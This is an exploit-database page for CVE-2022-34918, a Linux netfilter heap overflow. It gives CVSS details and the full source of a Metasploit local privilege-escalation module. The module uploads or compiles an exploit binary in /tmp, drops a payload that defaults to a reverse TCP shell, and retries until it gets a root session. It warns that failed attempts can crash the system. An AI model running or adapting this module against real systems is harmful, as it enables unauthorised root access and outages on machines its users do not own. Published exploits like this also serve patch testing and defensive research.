Exploitalert - Database of Exploits

Netfilter nft_set_elem_init Heap Overflow Privilege Escalation

CVE	Category	Price	Severity
CVE-2022-34918	CWE-787	$10,000	High

Author	Risk	Exploitation Type	Date
Lucas Leong	High	Local	2022-09-28

CVSS	EPSS	EPSSP
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Local	AV	The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	Low	PR	The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2022090080

Netfilter nft_set_elem_init Heap Overflow Privilege Escalation

# frozen_string_literal: true ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::Common include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Post::Linux::Compile include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Netfilter nft_set_elem_init Heap Overflow Privilege Escalation', 'Description' => %q{ An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges. The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access. The issue exists in nft_setelem_parse_data in net/netfilter/nf_tables_api.c. }, 'License' => MSF_LICENSE, 'Author' => [ 'Arthur Mongodin <amongodin[at]randorisec.fr> (@_Aleknight_)', # Vulnerability discovery, original exploit PoC 'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module, exploit PoC updates ], 'DisclosureDate' => '2022-02-07', 'Platform' => 'linux', 'Arch' => [ARCH_X64], 'SessionTypes' => %w[meterpreter shell], 'DefaultOptions' => { 'Payload' => 'linux/x64/shell_reverse_tcp', 'PrependSetresuid' => true, 'PrependSetresgid' => true, 'PrependFork' => true, 'WfsDelay' => 30 }, 'Targets' => [['Auto', {}]], 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => [UNRELIABLE_SESSION], # The module could fail to get root sometimes. 'Stability' => [OS_RESOURCE_LOSS, CRASH_OS_DOWN], # After too many failed attempts, the system needs to be restarted. 'SideEffects' => [ARTIFACTS_ON_DISK] }, 'References' => [ ['CVE', '2022-34918'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-34918'], ['URL', 'https://ubuntu.com/security/CVE-2022-34918'], ['URL', 'https://www.randorisec.fr/crack-linux-firewall/'], ['URL', 'https://github.com/randorisec/CVE-2022-34918-LPE-PoC'] ] ) ) register_options( [ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]), OptInt.new('MAX_TRIES', [ true, 'Number of times to execute the exploit', 5]) ] ) register_advanced_options( [ OptString.new('WritableDir', [true, 'Directory to write persistent payload file.', '/tmp']) ] ) end def base_dir datastore['WritableDir'] end def upload_exploit_binary @executable_path = ::File.join(base_dir, rand_text_alphanumeric(5..10)) upload_and_chmodx(@executable_path, exploit_data('CVE-2022-34918', 'ubuntu.elf')) register_file_for_cleanup(@executable_path) end def upload_payload_binary @payload_path = ::File.join(base_dir, rand_text_alphanumeric(5..10)) upload_and_chmodx(@payload_path, generate_payload_exe) register_file_for_cleanup(@payload_path) end def upload_source @exploit_source_path = ::File.join(base_dir, rand_text_alphanumeric(5..10)) mkdir(@exploit_source_path) register_dir_for_cleanup(@exploit_source_path) dirs = [ '.' ] until dirs.empty? current_dir = dirs.pop dir_full_path = ::File.join(::Msf::Config.install_root, 'external/source/exploits/CVE-2022-34918', current_dir) Dir.entries(dir_full_path).each do |ent| next if ent == '.' || ent == '..' full_path_host = ::File.join(dir_full_path, ent) relative_path = ::File.join(current_dir, ent) full_path_target = ::File.join(@exploit_source_path, current_dir, ent) if File.file?(full_path_host) vprint_status("Uploading #{relative_path} to #{full_path_target}") upload_file(full_path_target, full_path_host) elsif File.directory?(full_path_host) vprint_status("Creating the directory #{full_path_target}") mkdir(full_path_target) dirs.push(relative_path) else print_error("#{full_path_host} doesn't look like a file or a directory") end end end end def compile_source fail_with(Failure::BadConfig, 'make command not available on the target') unless command_exists?('make') info = cmd_exec("make -C #{@exploit_source_path}") vprint_status(info) @executable_path = ::File.join(@exploit_source_path, 'ubuntu.elf') if exists?(@executable_path) chmod(@executable_path, 0o700) unless executable?(@executable_path) print_good('Compilation was successful') else fail_with(Failure::UnexpectedReply, 'Compilation has failed (executable not found)') end end def run_payload success = false 1.upto(datastore['MAX_TRIES']) do |i| vprint_status "Execution attempt ##{i}" info = cmd_exec(@executable_path, @payload_path) info.each_line do |line| vprint_status(line.chomp) end if session_created? success = true break end sleep 3 end if success print_good('A session has been created') else print_bad('Exploit has failed') end end def get_external_source_code(cve, file) file_path = ::File.join(::Msf::Config.install_root, "external/source/exploits/#{cve}/#{file}") ::File.binread(file_path) end def module_check release = kernel_release version = "#{release} #{kernel_version.split(' ').first}" ubuntu_offsets = strip_comments(get_external_source_code('CVE-2022-34918', 'src/util.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first ubuntu_kernels = ubuntu_offsets.scan(/"(.+?)"/).flatten if ubuntu_kernels.empty? fail_with(Msf::Module::Failure::BadConfig, 'Error parsing the list of supported kernels.') end fail_with(Failure::NoTarget, "No offsets for '#{version}'") unless ubuntu_kernels.include?(version) fail_with(Failure::BadConfig, "#{base_dir} is not writable.") unless writable?(base_dir) fail_with(Failure::BadConfig, '/tmp is not writable.') unless writable?('/tmp') if is_root? fail_with(Failure::BadConfig, 'Session already has root privileges.') end end def check config = kernel_config return CheckCode::Unknown('Could not retrieve kernel config') if config.nil? return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS') unless config.include?('CONFIG_USER_NS=y') return CheckCode::Safe('Unprivileged user namespaces are not permitted') unless userns_enabled? return CheckCode::Safe('LKRG is installed') if lkrg_installed? arch = kernel_hardware return CheckCode::Safe("System architecture #{arch} is not supported") unless arch.include?('x86_64') release = kernel_release version, patchlvl = release.match(/^(\d+)\.(\d+)/)&.captures if version&.to_i == 5 && patchlvl && (7..19).include?(patchlvl.to_i) return CheckCode::Appears # ("The kernel #{version} appears to be vulnerable, but no offsets are available for this version") end CheckCode::Safe end def exploit module_check unless datastore['ForceExploit'] if datastore['COMPILE'] == 'True' || (datastore['COMPILE'] == 'Auto' && command_exists?('make')) print_status('Uploading the exploit source code') upload_source print_status('Compiling the exploit source code') compile_source else print_status('Dropping pre-compiled binaries to system...') upload_exploit_binary end print_status('Uploading payload...') upload_payload_binary print_status('Running payload on remote system...') run_payload end end

Impressum